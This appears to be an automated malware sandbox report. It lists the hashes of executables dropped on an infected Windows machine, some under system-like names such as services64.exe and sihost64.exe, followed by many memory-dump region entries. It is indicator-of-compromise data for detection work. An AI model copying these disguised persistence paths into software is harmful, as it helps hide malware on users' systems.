2e3da96b53c8914fe47b7ff32e72ef98

SHA1
1c92ee7c32c302a3a527168dcf744508ca711082

SHA256
9d56479b18affb519eaa5a8a5415205c8a2b4b76aa6982a28f3a0cdb3641c5e0

SHA512
480e073b9030cc9d633887d1f22421d9166a2a94080b8d81b1ab589e293d8110445d0aa4bd3089e0e28cf26bf657e486d67cfdda5476e854502bf7c1ee202b99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
95a9df5ab7468c20f2ac763163239ff3

SHA1
eeeb7537d55c70177f54fde3d5dcd143c3432ff8

SHA256
723f16b62cdd5138527881d04fb6cba0834d1e5b44c6a3a972dc71f6f16d274b

SHA512
acbfec25f10cbbbbd54586d8bd75d9799d6a16cfbe574961b2982bafa74a5671b7c099bcac122829da8f2d43a75ba88817146548b98bb4dd11b53fa0d91c45ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
30e0bfd5342d3e14b551c37ff1a22ea2

SHA1
21f2dbfdd5ab8fee1ba142016aed5bf933a60a4c

SHA256
8b629c5626f79773b5b41235ffd4e2d152732a782b30e6f2194e098dc280ba65

SHA512
cc90d26f663b519a74c5812b12e6f4a4a8c738169b2d318def97f3ef0af378076b01811368f5e523016b11a0b9b5800a595b01815309bf15e017e5e59edf7606

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
195f354e5855a0d1cc7efaa8362cf594

SHA1
e271f3840bcb8611a41fdc43e736b0502c1701f1

SHA256
4560bd87169bf8b75e118e53741350606cf755e6b9eaf7afb2e6bf1416bbfd7b

SHA512
240905885440b415b7b4b13f73ce190b2cf22f6bec84408fca6c9fc9d4f2fcf2e707b0c1e1e95b815e4fe426d9360bcc2fcf74318c378cec2133d4424784e555

Download Submit
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
MD5
55f246c4f670bddc2e1c6fab66fb9af8

SHA1
b2737bf54e19008f7230830c987e9cc45ca9dba7

SHA256
4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8

SHA512
c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
MD5
55f246c4f670bddc2e1c6fab66fb9af8

SHA1
b2737bf54e19008f7230830c987e9cc45ca9dba7

SHA256
4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8

SHA512
c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
MD5
f87ec0d92f1e1c57e281c3b7207264a4

SHA1
452ee705af24c36bb2235fc969dd122ede448e7b

SHA256
5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c

SHA512
8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052

Download Submit
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
MD5
f87ec0d92f1e1c57e281c3b7207264a4

SHA1
452ee705af24c36bb2235fc969dd122ede448e7b

SHA256
5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c

SHA512
8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server32.exe
MD5
7190f3a53c0e5247c2b7ece197acddea

SHA1
495b35f241df11b61ddc781ac64e2a3f24d6915b

SHA256
646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3

SHA512
cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server32.exe
MD5
7190f3a53c0e5247c2b7ece197acddea

SHA1
495b35f241df11b61ddc781ac64e2a3f24d6915b

SHA256
646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3

SHA512
cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server32.exe
MD5
7190f3a53c0e5247c2b7ece197acddea

SHA1
495b35f241df11b61ddc781ac64e2a3f24d6915b

SHA256
646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3

SHA512
cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
a48e4ecd100871e98f3b6128f9b37187

SHA1
8adf645a05d8ede551aadaaf51a37a47071497b9

SHA256
b141d0c63cfd6c373f4721eba43014c7ce9e1d3b10aabcefe17750abb9b55283

SHA512
bd481ddabcce4b9a1cbc95f0067058937effde93cc02c69785fc80ecdc99417753cf1696c1a1e337578256e98763e7e975845fd6aca71d4c3610ddd7eb20cda1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
a48e4ecd100871e98f3b6128f9b37187

SHA1
8adf645a05d8ede551aadaaf51a37a47071497b9

SHA256
b141d0c63cfd6c373f4721eba43014c7ce9e1d3b10aabcefe17750abb9b55283

SHA512
bd481ddabcce4b9a1cbc95f0067058937effde93cc02c69785fc80ecdc99417753cf1696c1a1e337578256e98763e7e975845fd6aca71d4c3610ddd7eb20cda1

Download Submit
C:\Users\Admin\services32.exe
MD5
55f246c4f670bddc2e1c6fab66fb9af8

SHA1
b2737bf54e19008f7230830c987e9cc45ca9dba7

SHA256
4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8

SHA512
c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe

Download Submit
C:\Users\Admin\services32.exe
MD5
55f246c4f670bddc2e1c6fab66fb9af8

SHA1
b2737bf54e19008f7230830c987e9cc45ca9dba7

SHA256
4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8

SHA512
c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe
MD5
ab0e8cd9d9374369b972868842a74471

SHA1
d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3

SHA256
873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea

SHA512
91d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb

Download Submit
C:\Windows\System32\services64.exe
MD5
f87ec0d92f1e1c57e281c3b7207264a4

SHA1
452ee705af24c36bb2235fc969dd122ede448e7b

SHA256
5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c

SHA512
8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052

Download Submit
C:\Windows\system32\Microsoft\Libs\sihost64.exe
MD5
ab0e8cd9d9374369b972868842a74471

SHA1
d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3

SHA256
873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea

SHA512
91d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb

Download Submit
C:\Windows\system32\services64.exe
MD5
f87ec0d92f1e1c57e281c3b7207264a4

SHA1
452ee705af24c36bb2235fc969dd122ede448e7b

SHA256
5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c

SHA512
8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052

Download Submit
memory/396-347-0x000001DF8E790000-0x000001DF8E792000-memory.dmp

Filesize
8KB

Download
memory/396-349-0x000001DF8E796000-0x000001DF8E798000-memory.dmp

Filesize
8KB

Download
memory/396-352-0x000001DF8E798000-0x000001DF8E799000-memory.dmp

Filesize
4KB

Download
memory/396-348-0x000001DF8E793000-0x000001DF8E795000-memory.dmp

Filesize
8KB

Download
memory/396-314-0x0000000000000000-mapping.dmp

Download
memory/428-371-0x0000000000000000-mapping.dmp

Download
memory/760-151-0x0000000004F10000-0x0000000004F11000-memory.dmp

Filesize
4KB

Download
memory/760-153-0x0000000005220000-0x0000000005221000-memory.dmp

Filesize
4KB

Download
memory/760-157-0x0000000006720000-0x0000000006721000-memory.dmp

Filesize
4KB

Download
memory/760-147-0x0000000004E60000-0x0000000004E61000-memory.dmp

Filesize
4KB

Download
memory/760-150-0x0000000004DF0000-0x00000000053F6000-memory.dmp

Filesize
6.0MB

Download
memory/760-149-0x0000000004EC0000-0x0000000004EC1000-memory.dmp

Filesize
4KB

Download
memory/760-140-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/760-357-0x0000000000000000-mapping.dmp

Download
memory/760-148-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/760-141-0x0000000000418D32-mapping.dmp

Download
memory/760-146-0x0000000005400000-0x0000000005401000-memory.dmp

Filesize
4KB

Download
memory/1016-128-0x0000000000401000-0x0000000000403000-memory.dmp

Filesize
8KB

Download
memory/1016-124-0x0000000000000000-mapping.dmp

Download
memory/1016-129-0x0000000000400000-0x0000000000EAE000-memory.dmp

Filesize
10.7MB

Download
memory/1332-275-0x0000000000000000-mapping.dmp

Download
memory/1344-554-0x0000023B6D100000-0x0000023B6D106000-memory.dmp

Filesize
24KB

Download
memory/1344-565-0x0000023B6EBE6000-0x0000023B6EBE7000-memory.dmp

Filesize
4KB

Download
memory/1344-563-0x0000023B6EBE0000-0x0000023B6EBE2000-memory.dmp

Filesize
8KB

Download
memory/1344-564-0x0000023B6EBE3000-0x0000023B6EBE5000-memory.dmp

Filesize
8KB

Download
memory/1408-160-0x00000230EDA30000-0x00000230EDA32000-memory.dmp

Filesize
8KB

Download
memory/1408-158-0x00000230EDA30000-0x00000230EDA32000-memory.dmp

Filesize
8KB

Download
memory/1408-175-0x00000230EDA30000-0x00000230EDA32000-memory.dmp

Filesize
8KB

Download
memory/1408-159-0x00000230EDA30000-0x00000230EDA32000-memory.dmp

Filesize
8KB

Download
memory/1408-166-0x00000230EDA30000-0x00000230EDA32000-memory.dmp

Filesize
8KB

Download
memory/1408-183-0x00000230ED8B0000-0x00000230ED8BF000-memory.dmp

Filesize
60KB

Download
memory/1408-184-0x00000230EF570000-0x00000230EF572000-memory.dmp

Filesize
8KB

Download
memory/1408-185-0x00000230EF573000-0x00000230EF575000-memory.dmp

Filesize
8KB

Download
memory/1408-161-0x00000230EDA30000-0x00000230EDA32000-memory.dmp

Filesize
8KB

Download
memory/1408-162-0x00000230EDA60000-0x00000230EDA6C000-memory.dmp

Filesize
48KB

Download
memory/1408-186-0x00000230EF576000-0x00000230EF577000-memory.dmp

Filesize
4KB

Download
memory/1408-164-0x00000230EDA30000-0x00000230EDA32000-memory.dmp

Filesize
8KB

Download
memory/1408-165-0x00000230EF490000-0x00000230EF491000-memory.dmp

Filesize
4KB

Download
memory/1452-495-0x0000000000000000-mapping.dmp

Download
memory/1496-353-0x0000000000000000-mapping.dmp

Download
memory/1504-508-0x000001DE4E6B0000-0x000001DE4E6B2000-memory.dmp

Filesize
8KB

Download
memory/1504-510-0x000001DE4E6B6000-0x000001DE4E6B7000-memory.dmp

Filesize
4KB

Download
memory/1504-509-0x000001DE4E6B3000-0x000001DE4E6B5000-memory.dmp

Filesize
8KB

Download
memory/1512-386-0x0000000000000000-mapping.dmp

Download
memory/1620-167-0x0000000000000000-mapping.dmp

Download
memory/1704-444-0x00000111CB3C3000-0x00000111CB3C5000-memory.dmp

Filesize
8KB

Download
memory/1704-443-0x00000111CB3C0000-0x00000111CB3C2000-memory.dmp

Filesize
8KB

Download
memory/1704-471-0x00000111CB3C6000-0x00000111CB3C8000-memory.dmp

Filesize
8KB

Download
memory/1704-472-0x00000111CB3C8000-0x00000111CB3C9000-memory.dmp

Filesize
4KB

Download
memory/1704-432-0x0000000000000000-mapping.dmp

Download
memory/1716-512-0x0000000000000000-mapping.dmp

Download
memory/1716-527-0x00000114460A3000-0x00000114460A5000-memory.dmp

Filesize
8KB

Download
memory/1716-552-0x00000114460A8000-0x00000114460A9000-memory.dmp

Filesize
4KB

Download
memory/1716-526-0x00000114460A0000-0x00000114460A2000-memory.dmp

Filesize
8KB

Download
memory/1716-548-0x00000114460A6000-0x00000114460A8000-memory.dmp

Filesize
8KB

Download
memory/1788-494-0x0000000000000000-mapping.dmp

Download
memory/1932-277-0x0000000000000000-mapping.dmp

Download
memory/1992-169-0x00000194DDA00000-0x00000194DDA02000-memory.dmp

Filesize
8KB

Download
memory/1992-173-0x00000194F7A10000-0x00000194F7A11000-memory.dmp

Filesize
4KB

Download
memory/1992-181-0x00000194DDA00000-0x00000194DDA02000-memory.dmp

Filesize
8KB

Download
memory/1992-246-0x00000194DDA38000-0x00000194DDA39000-memory.dmp

Filesize
4KB

Download
memory/1992-176-0x00000194DDA00000-0x00000194DDA02000-memory.dmp

Filesize
8KB

Download
memory/1992-174-0x00000194DDA00000-0x00000194DDA02000-memory.dmp

Filesize
8KB

Download
memory/1992-187-0x00000194DDA30000-0x00000194DDA32000-memory.dmp

Filesize
8KB

Download
memory/1992-188-0x00000194DDA33000-0x00000194DDA35000-memory.dmp

Filesize
8KB

Download
memory/1992-172-0x00000194DDA00000-0x00000194DDA02000-memory.dmp

Filesize
8KB

Download
memory/1992-171-0x00000194DDA00000-0x00000194DDA02000-memory.dmp

Filesize
8KB

Download
memory/1992-170-0x00000194DDA00000-0x00000194DDA02000-memory.dmp

Filesize
8KB

Download
memory/1992-179-0x00000194F7BC0000-0x00000194F7BC1000-memory.dmp

Filesize
4KB

Download
memory/1992-189-0x00000194DDA36000-0x00000194DDA38000-memory.dmp

Filesize
8KB

Download
memory/1992-168-0x0000000000000000-mapping.dmp

Download
memory/2132-271-0x000001AED1243000-0x000001AED1245000-memory.dmp

Filesize
8KB

Download
memory/2132-269-0x000001AED0D60000-0x000001AED0F82000-memory.dmp

Filesize
2.1MB

Download
memory/2132-270-0x000001AED1240000-0x000001AED1242000-memory.dmp

Filesize
8KB

Download
memory/2132-272-0x000001AED1246000-0x000001AED1247000-memory.dmp

Filesize
4KB

Download
memory/2196-138-0x0000000004CB0000-0x0000000004CB1000-memory.dmp

Filesize
4KB

Download
memory/2196-137-0x0000000002310000-0x0000000002311000-memory.dmp

Filesize
4KB

Download
memory/2196-136-0x0000000004B00000-0x0000000004B01000-memory.dmp

Filesize
4KB

Download
memory/2196-133-0x0000000000270000-0x0000000000271000-memory.dmp

Filesize
4KB

Download
memory/2196-127-0x0000000000000000-mapping.dmp

Download
memory/2324-500-0x0000000000000000-mapping.dmp

Download
memory/2416-264-0x0000000000000000-mapping.dmp

Download
memory/2416-346-0x0000016EF6D08000-0x0000016EF6D09000-memory.dmp

Filesize
4KB

Download
memory/2416-273-0x0000016EF6D00000-0x0000016EF6D02000-memory.dmp

Filesize
8KB

Download
memory/2416-274-0x0000016EF6D03000-0x0000016EF6D05000-memory.dmp

Filesize
8KB

Download
memory/2416-309-0x0000016EF6D06000-0x0000016EF6D08000-memory.dmp

Filesize
8KB

Download
memory/2772-425-0x00000228F50B6000-0x00000228F50B7000-memory.dmp

Filesize
4KB

Download
memory/2772-424-0x00000228F50B3000-0x00000228F50B5000-memory.dmp

Filesize
8KB

Download
memory/2772-423-0x00000228F50B0000-0x00000228F50B2000-memory.dmp

Filesize
8KB

Download
memory/2848-117-0x0000000077E30000-0x0000000077FBE000-memory.dmp

Filesize
1.6MB

Download
memory/2848-131-0x0000000007500000-0x0000000007501000-memory.dmp

Filesize
4KB

Download
memory/2848-134-0x00000000070F0000-0x00000000070F1000-memory.dmp

Filesize
4KB

Download
memory/2848-118-0x0000000001020000-0x0000000001021000-memory.dmp

Filesize
4KB

Download
memory/2848-120-0x0000000005FF0000-0x0000000005FF1000-memory.dmp

Filesize
4KB

Download
memory/3016-566-0x000001D11ECB0000-0x000001D11ECD0000-memory.dmp

Filesize
128KB

Download
memory/3016-511-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/3016-505-0x000000014030F3F8-mapping.dmp

Download
memory/3016-553-0x000001D11EC90000-0x000001D11ECB0000-memory.dmp

Filesize
128KB

Download
memory/3044-178-0x0000000000000000-mapping.dmp

Download
memory/3112-481-0x0000027C06800000-0x0000027C06807000-memory.dmp

Filesize
28KB

Download
memory/3112-484-0x0000027C084C6000-0x0000027C084C7000-memory.dmp

Filesize
4KB

Download
memory/3112-483-0x0000027C084C3000-0x0000027C084C5000-memory.dmp

Filesize
8KB

Download
memory/3112-482-0x0000027C084C0000-0x0000027C084C2000-memory.dmp

Filesize
8KB

Download
memory/3116-286-0x0000000000000000-mapping.dmp

Download
memory/3196-252-0x000002A46AFD3000-0x000002A46AFD5000-memory.dmp

Filesize
8KB

Download
memory/3196-253-0x000002A46AFD6000-0x000002A46AFD8000-memory.dmp

Filesize
8KB

Download
memory/3196-251-0x000002A46AFD8000-0x000002A46AFD9000-memory.dmp

Filesize
4KB

Download
memory/3196-249-0x000002A46AFD0000-0x000002A46AFD2000-memory.dmp

Filesize
8KB

Download
memory/3196-212-0x0000000000000000-mapping.dmp

Download
memory/3620-281-0x0000000000000000-mapping.dmp

Download
memory/3632-263-0x0000000000000000-mapping.dmp

Download
memory/3640-180-0x0000000000000000-mapping.dmp

Download
memory/3800-372-0x0000000000000000-mapping.dmp

Download
memory/3800-426-0x000002714FDB0000-0x000002714FDB2000-memory.dmp

Filesize
8KB

Download
memory/3800-427-0x000002714FDB3000-0x000002714FDB5000-memory.dmp

Filesize
8KB

Download
memory/3800-428-0x000002714FDB6000-0x000002714FDB8000-memory.dmp

Filesize
8KB

Download
memory/3800-442-0x000002714FDB8000-0x000002714FDB9000-memory.dmp

Filesize
4KB

Download
memory/4044-121-0x0000000000000000-mapping.dmp

Download